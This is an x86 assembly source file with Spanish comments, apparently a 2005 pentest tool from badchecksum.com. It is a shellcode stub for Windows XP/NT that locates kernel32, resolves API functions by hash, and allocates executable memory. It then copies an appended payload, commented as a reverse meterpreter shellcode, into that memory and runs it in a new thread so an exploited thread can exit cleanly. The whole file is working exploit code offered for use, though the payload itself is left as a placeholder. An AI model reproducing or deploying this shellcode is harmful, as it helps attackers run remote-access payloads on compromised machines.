/*
    Badchecksum - www.badchecksum.com
*/
/*
    Nombre: RelocateShellcode
    Descripción:
        Shellcode que utiliza VirtualAlloc para reservar una zona de memoria
en el mismo proceso en el que se ejecuta, depues copia la shellcode que la sigue
a ella misma en memoria a esta zona y la ejecuta en un nuevo thread. Utiliza la
tecnica topstack para encontrar el kernel y hashes generados mediante
http://www.badchecksum.com/code/pentest/findhash.c
para resolver las direcciones de las funciones. Esta shellcode es util para
ejecutar el payload de un exploit en otro thread y despues salir del thread explotado
limpiamente o incluso restaurar una ejecucion normal.
    Autor: Simkin
    Fecha: 9/01/2005
    OS: Winxp/nt
    Compilador: nasm/alink
    Compilacion:
	nasmw -f win32 shellcode.asm 
	alink -oPE -entry startup shellcode.obj
*/

[segment .text]
[global startup]

startup:
	
	call find_kernel32
	mov edx, eax
	
	call get_hashes_base
	mov esi, eax
	
	lea edi, [ebp+0x4]
	mov ecx, esi
	add ecx, 0x10	;4 functions, 16 bytes
	call resolve_symbols_for_dll

	;VirtualAlloc(NULL,1024,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	push 0x40	;PAGE_EXECUTE_READWRITE
	push 0x3000	;MEM_COMMIT | MEM_RESERVE
	push 0x400	;1024 bytes
	push 0x0	;NULL
	call [ebp+0x4]
	mov esi, eax	
	
	;GetCurrentProcess()
	call [ebp+0x8]
	mov edi, eax

	call get_shellcode_base
	mov ecx, eax

	;WriteProcessMemory(GetCurrentProcess(),proc,scode,strlen(scode),NULL);
	push 0x0	;NULL
	push 0x7D0	;Reverse meterpreter shellcode length (2000 bytes)
	push ecx	;scode
	push esi	;proc
	push edi	;GetCurrentProcess()
	call[ebp + 0xc]
	
	;CreateThread(NULL,0,proc,NULL,0,NULL);
	push 0x0	;NULL
	push 0x0	;0
	push 0x0	;NULL
	push esi	;proc
	push 0x0	;0
	push 0x0	;NULL
	call[ebp + 0x10]

	;Exit here..

find_kernel32:
	push esi
	xor esi, esi
	mov esi, [fs:esi + 0x18]
	lodsd
	lodsd
	mov eax, [eax - 0x1c]
	find_kernel32_base:
	find_kernel32_base_loop:
		dec eax
		xor ax, ax
		cmp word [eax], 0x5a4d
		jne find_kernel32_base_loop
	find_kernel32_base_finished:
	pop esi
	ret

find_function:
	pushad
	mov ebp, [esp + 0x24]
	mov eax, [ebp + 0x3c]
	mov edx, [ebp + eax + 0x78]
	add edx, ebp
	mov ecx, [edx + 0x18]
	mov ebx, [edx + 0x20]
	add ebx, ebp

	find_function_loop:
		jecxz find_function_finished
		dec ecx
		mov esi, [ebx + ecx * 4]
		add esi, ebp
		compute_hash:
		xor edi, edi
		xor eax, eax
		cld
		compute_hash_again:
			lodsb
			test al, al
			jz compute_hash_finished
			ror edi, 0xd
			add edi, eax
			jmp compute_hash_again
			compute_hash_finished:
		cmp edi, [esp + 0x28]
		jnz find_function_loop
	
	mov ebx, [edx + 0x24]
	add ebx, ebp
	mov cx, [ebx + 2 * ecx]
	mov ebx, [edx + 0x1c]
	add ebx, ebp
	mov eax, [ebx + 4 * ecx]
	add eax, ebp
	mov [esp + 0x1c], eax
	find_function_finished:
	popad
	ret

resolve_symbols_for_dll:
	lodsd
	push eax				
	push edx
	call find_function
	mov [edi], eax
	add esp, 0x08
	add edi, 0x04
	cmp esi, ecx
	jne resolve_symbols_for_dll
	resolve_symbols_for_dll_finished:
	ret

get_hashes_base:
	jmp  forward
		middle:
			jmp end
		forward:
			call middle
	end:
	pop eax
	add eax, 0x7
	ret
	kernel32_symbol_hashes:
		db 0x54,0xca,0xaf,0x91	;VirtualAlloc
		db 0xe6,0x17,0x8f,0x7b	;GetCurrentProcess
		db 0xa1,0x6a,0x3d,0xd8	;WriteProcessMemory
		db 0x6b,0xd0,0x2b,0xca	;CreateThread


get_shellcode_base:
	jmp  forward2
		middle2:
			jmp end2
		forward2:
			call middle2
	end2:
	pop eax
	add eax, 0x7
	ret
	;Aqui va la shellcode